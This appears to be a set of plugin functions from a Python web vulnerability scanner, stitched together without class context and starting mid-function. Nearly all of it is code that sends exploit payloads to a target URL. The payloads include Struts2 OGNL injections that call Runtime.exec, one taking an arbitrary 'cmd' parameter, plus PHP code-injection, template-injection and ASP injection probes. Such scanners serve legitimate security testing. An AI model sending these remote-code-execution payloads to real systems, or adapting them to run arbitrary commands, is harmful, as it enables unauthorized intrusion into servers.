if out.set(i):
out.success(url, self.name, info=i)
def audit(self):
method = self.requests.command # 请求方式 GET or POST
version = self.requests.request_version # HTTP 0.9/1.0/1.1
headers = self.requests.get_headers() # 请求头 dict类型
url = self.build_url() # 请求完整URL
resp_data = self.response.get_body_data() # 返回数据 byte类型
resp_str = self.response.get_body_str() # 返回数据 str类型 自动解码
resp_headers = self.response.get_headers() # 返回头 dict类型
p = self.requests.urlparse
params = self.requests.params
netloc = self.requests.netloc
if self.response.language and self.response.language != "JAVA":
return
if method == 'GET':
exi = os.path.splitext(p.path)[1]
if exi not in acceptedExt:
return
ran_a = random.randint(10000000, 20000000)
ran_b = random.randint(1000000, 2000000)
ran_check = ran_a - ran_b
lin = 'expr' + ' ' + str(ran_a) + ' - ' + str(ran_b)
checks = [
str(ran_check), '无法初始化设备 PRN', '??????? PRN',
'<Struts2-vuln-Check>', 'Unable to initialize device PRN'
]
payloads = [
r"method%3a%23_memberAccess%[email protected]+@DEFAULT_MEMBER_ACCESS%2c%23kxlzx%[email protected]@getResponse%28%29.getWriter%28%29%2c%23kxlzx.println%28"
+ str(ran_a) + '-' + str(ran_b) + "%29%2c%23kxlzx.close",
r"method:%23_memberAccess%[email protected]@DEFAULT_MEMBER_ACCESS,%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding[0]),%23w%3d%23res.getWriter(),%23s%3dnew+java.util.Scanner(@java.lang.Runtime@getRuntime().exec(%23parameters.cmd[0]).getInputStream()).useDelimiter(%23parameters.pp[0]),%23str%3d%23s.hasNext()%3f%23s.next()%3a%23parameters.ppp[0],%23w.print(%23str),%23w.close(),1?%23xx:%23request.toString&cmd=print+test&pp=\\A&ppp=%20&encoding=UTF-8",
r"method:%23_memberAccess%[email protected]@DEFAULT_MEMBER_ACCESS,%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding[0]),%23w%3d%23res.getWriter(),%23s%3dnew+java.util.Scanner(@java.lang.Runtime@getRuntime().exec(%23parameters.cmd[0]).getInputStream()).useDelimiter(%23parameters.pp[0]),%23str%3d%23s.hasNext()%3f%23s.next()%3a%23parameters.ppp[0],%23w.print(%23str),%23w.close(),1?%23xx:%23request.toString&cmd="
+ lin + r"&pp=\\A&ppp=%20&encoding=UTF-8",
r"method:%23_memberAccess%[email protected]@DEFAULT_MEMBER_ACCESS,%23req%3d%40org.apache.struts2.ServletActionContext%40getRequest(),%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding[0]),%23path%3d%23req.getRealPath(%23parameters.pp[0]),%23w%3d%23res.getWriter(),%23w.print(%23path),%23w.print('Check>'),1?%23xx:%23request.toString&pp=<Struts2-vuln-&encoding=UTF-8"
]
headers['Content-Type'] = 'application/x-www-form-urlencoded'
for payload in payloads:
r = requests.post(url, headers=headers, data=payload)
html1 = r.text
for check in checks:
if check in html1:
out.success(url,
self.name,
playload="{}".format(payload),
method="POST",
check=check,
raw=r.raw)
return
def audit(self):
method = self.requests.command # 请求方式 GET or POST
headers = self.requests.get_headers() # 请求头 dict类型
url = self.build_url() # 请求完整URL
resp_data = self.response.get_body_data() # 返回数据 byte类型
resp_str = self.response.get_body_str() # 返回数据 str类型 自动解码
resp_headers = self.response.get_headers() # 返回头 dict类型
post_hint = self.requests.post_hint
post_data = self.requests.post_data
p = self.requests.urlparse
params = self.requests.params
netloc = self.requests.netloc
if method == 'POST':
regx = 'Parse error: syntax error,.*?\Sin\S'
randint = random.randint(1, 256)
verify_result = md5(str(randint).encode())
payloads = [
"print(md5({}));",
";print(md5({}));",
"';print(md5({}));$a='",
"\";print(md5({}));$a=\"",
"${{@print(md5({}))}}",
"${{@print(md5({}))}}\\"
]
if post_hint == POST_HINT.NORMAL:
for k, v in post_data.items():
if k.lower() in ignoreParams:
continue
data = copy.deepcopy(post_data)
for payload in payloads:
if payload[0] == "p":
data[k] = payload.format(randint)
else:
data[k] = v + payload.format(randint)
r = requests.post(url, data=data, headers=headers)
html1 = r.text
if verify_result in html1:
out.success(url, self.name, payload="{}:{}".format(k, data[k]), method=method,
data=str(data), raw=r.raw)
break
if re.search(regx, html1, re.I | re.S | re.M):
out.success(url, self.name, payload="{}:{}".format(k, data[k]), method=method,
data=str(data), raw=r.raw)
break
def audit(self):
method = self.requests.command # 请求方式 GET or POST
version = self.requests.request_version # HTTP 0.9/1.0/1.1
headers = self.requests.get_headers() # 请求头 dict类型
url = self.build_url() # 请求完整URL
resp_data = self.response.get_body_data() # 返回数据 byte类型
resp_str = self.response.get_body_str() # 返回数据 str类型 自动解码
resp_headers = self.response.get_headers() # 返回头 dict类型
p = self.requests.urlparse
params = self.requests.params
netloc = self.requests.netloc
if self.response.language and self.response.language != "JAVA":
return
if method == 'GET':
exi = os.path.splitext(p.path)[1]
if exi not in acceptedExt:
return
ran_a = random.randint(10000000, 20000000)
ran_b = random.randint(1000000, 2000000)
ran_check = ran_a - ran_b
lin = 'expr' + ' ' + str(ran_a) + ' - ' + str(ran_b)
checks = [
str(ran_check), '无法初始化设备 PRN', '??????? PRN',
'<Struts2-vuln-Check>', 'Unable to initialize device PRN'
]
payloads = [
r'''a=1${(%23_memberAccess["allowStaticMethodAccess"]=true,%[email protected]@getRuntime().exec('print test').getInputStream(),%23b=new+java.io.InputStreamReader(%23a),%23c=new+java.io.BufferedReader(%23b),%23d=new+char[50000],%23c.read(%23d),%[email protected]@getResponse().getWriter(),%23sbtest.println(%23d),%23sbtest.close())}''',
r'''a=1${(%23_memberAccess["allowStaticMethodAccess"]=true,%[email protected]@getRuntime().exec("'''
+ lin +
'''").getInputStream(),%23b=new+java.io.InputStreamReader(%23a),%23c=new+java.io.BufferedReader(%23b),%23d=new+char[50000],%23c.read(%23d),%[email protected]@getResponse().getWriter(),%23sbtest.println(%23d),%23sbtest.close())}''',
r'a=1${(%23_memberAccess["allowStaticMethodAccess"]=true,%[email protected]@getRequest(),%[email protected]@getResponse().getWriter(),%23k8out.print(%23req.getRealPath("<Struts2-vuln-")),%23k8out.println("Check>"),%23k8out.close())}'
]
headers['Content-Type'] = 'application/x-www-form-urlencoded'
for payload in payloads:
r = requests.post(url, headers=headers, data=payload)
html1 = r.text
for check in checks:
if check in html1:
out.success(url,
self.name,
playload="{}".format(payload),
method="POST",
check=check,
raw=r.raw)
break
def audit(self):
method = self.requests.command # 请求方式 GET or POST
headers = self.requests.get_headers() # 请求头 dict类型
url = self.build_url() # 请求完整URL
resp_data = self.response.get_body_data() # 返回数据 byte类型
resp_str = self.response.get_body_str() # 返回数据 str类型 自动解码
resp_headers = self.response.get_headers() # 返回头 dict类型
p = self.requests.urlparse
params = self.requests.params
netloc = self.requests.netloc
if self.response.language and self.response.language != "JAVA":
return
if method == 'GET':
exi = os.path.splitext(p.path)[1]
if exi not in acceptedExt:
return
check = '<Struts2-vuln-Check>'
payloads = [
r"debug=browser&object=(%[email protected]@DEFAULT_MEMBER_ACCESS)%3f(%23context%5B%23parameters.rpsobj%5B0%5D%5D.getWriter().print(%23context%5B%23parameters.reqobj%5B0%5D%5D.getRealPath(%23parameters.pp%5B0%5D)))(#context[#parameters.rpsobj[0]].getWriter().print('Check>')):sb.toString.json&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&pp=<Struts2-vuln-&reqobj=com.opensymphony.xwork2.dispatcher.HttpServletRequest",
r"debug=browser&object=%28%23_memberAccess%[email protected]@DEFAULT_MEMBER_ACCESS%2c%23res%[email protected]@getResponse%28%29%2c%23w%3d%23res.getWriter%28%29%2c%23w.print%28%27<Struts2-vuln%27%2b%27-Check>%27%29%29",
r"debug=browser&object=(%23_memberAccess%[email protected]@DEFAULT_MEMBER_ACCESS,%23req%3d%40org.apache.struts2.ServletActionContext%40getRequest(),%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23path%3d%23req.getRealPath(%23parameters.pp[0]),%23w%3d%23res.getWriter(),%23w.print(%23path),%23w.print('Check>'))&pp=Struts2-vuln-"
]
headers['Content-Type'] = 'application/x-www-form-urlencoded'
for payload in payloads:
r1 = requests.post(url, headers=headers, data=payload)
if check in r1.text:
out.success(url,
self.name,
playload="{}".format(payload),
method="POST",
check=check,
raw=r1.raw)
return
r2 = requests.get(
netloc + '?' + payload,
headers=headers,
)
if check in r2.text:
out.success(url,
self.name,
playload="{}".format(payload),
method="GET",
check=check,
raw=r2.raw)
return
def audit(self):
method = self.requests.command # 请求方式 GET or POST
version = self.requests.request_version # HTTP 0.9/1.0/1.1
headers = self.requests.get_headers() # 请求头 dict类型
url = self.build_url() # 请求完整URL
resp_data = self.response.get_body_data() # 返回数据 byte类型
resp_str = self.response.get_body_str() # 返回数据 str类型 自动解码
resp_headers = self.response.get_headers() # 返回头 dict类型
p = self.requests.urlparse
params = self.requests.params
netloc = self.requests.netloc
if self.response.language and self.response.language != "JAVA":
return
if method == 'GET':
exi = os.path.splitext(p.path)[1]
if exi not in acceptedExt:
return
ran_a = random.randint(10000000, 20000000)
ran_b = random.randint(1000000, 2000000)
ran_check = ran_a - ran_b
lin = 'expr' + ' ' + str(ran_a) + ' - ' + str(ran_b)
checks = [
str(ran_check), '无法初始化设备 PRN', '??????? PRN',
'Struts2-vuln-Check', 'Unable to initialize device PRN'
]
payloads = [
r"('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\[email protected]@EMPTY_SET')(c))&(g)(('\43mycmd\75\'print test\'')(d))&(h)(('\43myret\[email protected]@getRuntime().exec(\43mycmd)')(d))&(i)(('\43mydat\75new\40java.io.DataInputStream(\43myret.getInputStream())')(d))&(j)(('\43myres\75new\40byte[51020]')(d))&(k)(('\43mydat.readFully(\43myres)')(d))&(l)(('\43mystr\75new\40java.lang.String(\43myres)')(d))&(m)(('\43myout\[email protected]@getResponse()')(d))&(n)(('\43myout.getWriter().println(\43mystr)')(d))",
r"('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\[email protected]@EMPTY_SET')(c))&(g)(('\43mycmd\75\'"
+ lin +
r"\'')(d))&(h)(('\43myret\[email protected]@getRuntime().exec(\43mycmd)')(d))&(i)(('\43mydat\75new\40java.io.DataInputStream(\43myret.getInputStream())')(d))&(j)(('\43myres\75new\40byte[51020]')(d))&(k)(('\43mydat.readFully(\43myres)')(d))&(l)(('\43mystr\75new\40java.lang.String(\43myres)')(d))&(m)(('\43myout\[email protected]@getResponse()')(d))&(n)(('\43myout.getWriter().println(\43mystr)')(d))",
r'''('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))=&('\43c')(('\43_memberAccess.excludeProperties\[email protected]@EMPTY_SET')(c))=&(i2)(('\43xman\[email protected]@getResponse()')(d))=&(i95)(('\43xman.getWriter().print("Struts2-")')(d))=&&(i96)(('\43xman.getWriter().print("vuln-Check")')(d))=&(i99)(('\43xman.getWriter().close()')(d))='''
]
headers['Content-Type'] = 'application/x-www-form-urlencoded'
for payload in payloads:
r = requests.post(url, headers=headers, data=payload)
html1 = r.text
for check in checks:
if check in html1:
out.success(url,
self.name,
playload="{}".format(payload),
method="POST",
check=check,
raw=r.raw)
return
def audit(self):
method = self.requests.command # 请求方式 GET or POST
headers = self.requests.get_headers() # 请求头 dict类型
url = self.build_url() # 请求完整URL
resp_data = self.response.get_body_data() # 返回数据 byte类型
resp_str = self.response.get_body_str() # 返回数据 str类型 自动解码
resp_headers = self.response.get_headers() # 返回头 dict类型
p = self.requests.urlparse
params = self.requests.params
netloc = self.requests.netloc
if method == 'GET':
if p.query == '':
return
exi = os.path.splitext(p.path)[1]
if exi not in acceptedExt:
return
for k, v in params.items():
if k.lower() in ignoreParams:
continue
data = copy.deepcopy(params)
randint1 = random.randint(100, 900)
randint2 = random.randint(100, 900)
randstr = random_str(4)
payloads = {
"{ranstr}${{{int1}*{int2}}}{ranstr}".format(ranstr=randstr,
int1=randint1,
int2=randint2),
"{ranstr}#{{{int1}*{int2}}}{ranstr}".format(ranstr=randstr,
int1=randint1,
int2=randint2)
}
flag = "{ranstr}.?{{?{int}}}?{ranstr}".format(ranstr=randstr,
int=randint1 *
randint2)
for payload in payloads:
data[k] = v + payload
r = requests.get(netloc, params=data, headers=headers)
if re.search(flag, r.text):
out.success(url,
self.name,
payload="{}:{}".format(k,
data[k],
raw=r.raw))
def audit(self):
method = self.requests.command # 请求方式 GET or POST
version = self.requests.request_version # HTTP 0.9/1.0/1.1
headers = self.requests.get_headers() # 请求头 dict类型
url = self.build_url() # 请求完整URL
resp_data = self.response.get_body_data() # 返回数据 byte类型
resp_str = self.response.get_body_str() # 返回数据 str类型 自动解码
resp_headers = self.response.get_headers() # 返回头 dict类型
p = self.requests.urlparse
params = self.requests.params
netloc = self.requests.netloc
if self.response.language and self.response.language != "JAVA":
return
if method == 'GET':
exi = os.path.splitext(p.path)[1]
if exi not in acceptedExt:
return
ran_a = random.randint(10000000, 20000000)
ran_b = random.randint(1000000, 2000000)
ran_check = ran_a - ran_b
lin = 'expr' + ' ' + str(ran_a) + ' - ' + str(ran_b)
checks = [
str(ran_check), '无法初始化设备 PRN', '??????? PRN',
'Unable to initialize device PRN'
]
payloads = [
r"/%24%7B%23context%5B'xwork.MethodAccessor.denyMethodExecution'%5D%3Dfalse%2C%23m%3D%23_memberAccess.getClass().getDeclaredField('allowStaticMethodAccess')%2C%23m.setAccessible(true)%2C%23m.set(%23_memberAccess%2Ctrue)%2C%23q%3D%40org.apache.commons.io.IOUtils%40toString(%40java.lang.Runtime%40getRuntime().exec('print test').getInputStream())%2C%23q%7D.action",
r"/%24%7B%23context%5B'xwork.MethodAccessor.denyMethodExecution'%5D%3Dfalse%2C%23m%3D%23_memberAccess.getClass().getDeclaredField('allowStaticMethodAccess')%2C%23m.setAccessible(true)%2C%23m.set(%23_memberAccess%2Ctrue)%2C%23q%3D%40org.apache.commons.io.IOUtils%40toString(%40java.lang.Runtime%40getRuntime().exec('"
+ lin + "').getInputStream())%2C%23q%7D.action"
]
headers['Content-Type'] = 'application/x-www-form-urlencoded'
for payload in payloads:
r = requests.get(netloc + payload, headers=headers)
html1 = r.text
for check in checks:
if check in html1:
out.success(url,
self.name,
playload="{}".format(payload),
method=method,
check=check,
raw=r.raw)
return
def audit(self):
method = self.requests.command # 请求方式 GET or POST
headers = self.requests.get_headers() # 请求头 dict类型
url = self.build_url() # 请求完整URL
resp_data = self.response.get_body_data() # 返回数据 byte类型
resp_str = self.response.get_body_str() # 返回数据 str类型 自动解码
resp_headers = self.response.get_headers() # 返回头 dict类型
p = self.requests.urlparse
params = self.requests.params
netloc = self.requests.netloc
if self.response.language and self.response.language != "ASP":
return
if method == 'GET':
if p.query == '':
return
exi = os.path.splitext(p.path)[1]
if exi not in acceptedExt:
return
randint1 = random.randint(10000, 90000)
randint2 = random.randint(10000, 90000)
randint3 = randint1 * randint2
payloads = [
'response.write({}*{})'.format(randint1, randint2),
'\'+response.write({}*{})+\''.format(randint1, randint2),
'"response.write({}*{})+"'.format(randint1, randint2),
]
for k, v in params.items():
if k.lower() in ignoreParams:
continue
data = copy.deepcopy(params)
for payload in payloads:
if payload[0] == "":
data[k] = payload
else:
data[k] = v + payload
url1 = prepare_url(netloc, params=data)
r = requests.get(url1, headers=headers)
html1 = r.text
if str(randint3) in html1:
out.success(url, self.name, payload="{}:{}".format(k, data[k]), raw=r.raw)
break
def audit(self):
method = self.requests.command # 请求方式 GET or POST
headers = self.requests.get_headers() # 请求头 dict类型
url = self.build_url() # 请求完整URL
resp_data = self.response.get_body_data() # 返回数据 byte类型
resp_str = self.response.get_body_str() # 返回数据 str类型 自动解码
resp_headers = self.response.get_headers() # 返回头 dict类型
p = self.requests.urlparse
params = self.requests.params
netloc = self.requests.netloc
if self.response.language and self.response.language != "JAVA":
return
if method == 'GET':
exi = os.path.splitext(p.path)[1]
if exi not in acceptedExt:
return
check = '<Struts2-vuln-Check>'
payloads = [
r"redirect:$%7B%23a%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),%23b%3d%23a.getRealPath(%22<Struts2-vuln-%22),%23matt%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matt.getWriter().print(%23b),%23matt.getWriter().print('Check>'),%23matt.getWriter().flush(),%23matt.getWriter().close()%7D",
r"redirect%3a%24%7b%23resp%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2c%23resp.getWriter%28%29.print%28%27<Struts2-vuln%27%2b%27-Check>%27%29%2c%23resp.getWriter%28%29.flush%28%29%2c%23resp.getWriter%28%29.close%28%29%7d",
]
headers['Content-Type'] = 'application/x-www-form-urlencoded'
for payload in payloads:
r1 = requests.post(url, headers=headers, data=payload)
if check in r1.text:
out.success(url,
self.name,
playload="{}".format(payload),
method="POST",
check=check,
raw=r1.raw)
return
r2 = requests.get(
netloc + '?' + payload,
headers=headers,
)
if check in r2.text:
out.success(url,
self.name,
playload="{}".format(payload),
method="GET",
check=check,
raw=r2.raw)
return
